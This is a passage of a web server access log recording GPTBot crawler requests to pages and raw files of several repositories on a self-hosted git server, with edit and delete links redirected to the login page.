GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:16:19:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 12503] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:16:19:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 10233] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:16:19:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 9990] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:16:19:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 558] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:16:19:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 9990] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:16:19:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/dummy.cpp" [Client 74.7.227.38] [Length 9939] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/dummy.cpp" -[17/Feb/2026:16:19:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/dummy.cpp" [Client 74.7.227.38] [Length 10189] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/dummy.cpp" -[17/Feb/2026:16:19:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/dummy.cpp" [Client 74.7.227.38] [Length 30] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/dummy.cpp" -[17/Feb/2026:16:19:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 10239] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:16:19:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 11514] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:16:19:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 424] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:16:19:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 12888] [Gzip 6.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:16:19:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 886] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:16:19:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 10238] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:16:19:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?q=&sort=mostissues&state=open" [Client 74.7.227.38] [Length 8491] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones" -[17/Feb/2026:16:19:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 11855] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html" -[17/Feb/2026:16:19:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/fallback_http_error.log" [Client 74.7.227.38] [Length 21100] [Gzip 7.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs" -[17/Feb/2026:16:19:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/templates/index.html?display=source" [Client 74.7.227.38] [Length 15707] [Gzip 5.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/templates/index.html" -[17/Feb/2026:16:19:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/templates/index.html?display=rendered" [Client 74.7.227.38] [Length 10942] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/templates/index.html" -[17/Feb/2026:16:19:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/templates/index.html?display=rendered" [Client 74.7.227.38] [Length 10972] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/templates/index.html" -[17/Feb/2026:16:19:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/status.json?display=source" [Client 74.7.227.38] [Length 11059] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/status.json" -[17/Feb/2026:16:19:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/index.html?display=source" [Client 74.7.227.38] [Length 14403] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/index.html" -[17/Feb/2026:16:19:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/index.html?display=source" [Client 74.7.227.38] [Length 14404] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/index.html" -[17/Feb/2026:16:19:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/fetcher.py.claude?display=rendered" [Client 74.7.227.38] [Length 10971] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/fetcher.py.claude" -[17/Feb/2026:16:19:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/fetcher.py.claude?display=source" [Client 74.7.227.38] [Length 15316] [Gzip 4.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/fetcher.py.claude" -[17/Feb/2026:16:19:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?sort=mostissues&state=closed" [Client 74.7.227.38] [Length 8503] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones?q=&sort=mostissues&state=open" -[17/Feb/2026:16:19:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/index.tsx" -[17/Feb/2026:16:19:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4843] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/index.tsx" -[17/Feb/2026:16:19:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/logs/fallback_http_error.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/fallback_http_error.log" -[17/Feb/2026:16:19:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4843] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/logs/fallback_http_error.log" -[17/Feb/2026:16:19:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/logs/fallback_http_error.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/fallback_http_error.log" -[17/Feb/2026:16:19:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4843] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/logs/fallback_http_error.log" -[17/Feb/2026:16:19:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/index.tsx" -[17/Feb/2026:16:19:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4843] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/index.tsx" -[17/Feb/2026:16:19:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 11123] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/index.tsx" -[17/Feb/2026:16:19:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 9773] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/index.tsx" -[17/Feb/2026:16:19:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/index.tsx" -[17/Feb/2026:16:19:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 820] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/index.tsx" -[17/Feb/2026:16:19:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/logs/fallback_http_error.log" [Client 74.7.227.38] [Length 2437] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/fallback_http_error.log" -[17/Feb/2026:16:19:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/logs/fallback_http_error.log" [Client 74.7.227.38] [Length 74625] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/fallback_http_error.log" -[17/Feb/2026:16:19:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/pyvenv.cfg?display=rendered" [Client 74.7.227.38] [Length 10970] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/pyvenv.cfg" -[17/Feb/2026:16:19:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog.service" [Client 74.7.227.38] [Length 12583] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol" -[17/Feb/2026:16:19:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?sort=closestduedate&state=closed" [Client 74.7.227.38] [Length 8506] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones?q=&sort=closestduedate&state=open" -[17/Feb/2026:16:19:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 10462] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" -[17/Feb/2026:16:19:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 10465] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" -[17/Feb/2026:16:19:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/index.tsx" -[17/Feb/2026:16:19:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4843] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/html/index.tsx" -[17/Feb/2026:16:19:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/index.tsx" -[17/Feb/2026:16:19:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4843] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/html/index.tsx" -[17/Feb/2026:16:19:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" [Client 74.7.227.38] [Length 10297] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:16:19:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/status.json?display=source" [Client 74.7.227.38] [Length 11054] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/status.json" -[17/Feb/2026:16:19:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/status.json?display=source" [Client 74.7.227.38] [Length 11054] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/status.json" -[17/Feb/2026:16:19:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/status.json?display=source" [Client 74.7.227.38] [Length 11052] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/status.json" -[17/Feb/2026:16:19:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/status.json?display=source" [Client 74.7.227.38] [Length 11056] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/status.json" -[17/Feb/2026:16:19:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/watchdog.service" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog.service" -[17/Feb/2026:16:19:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 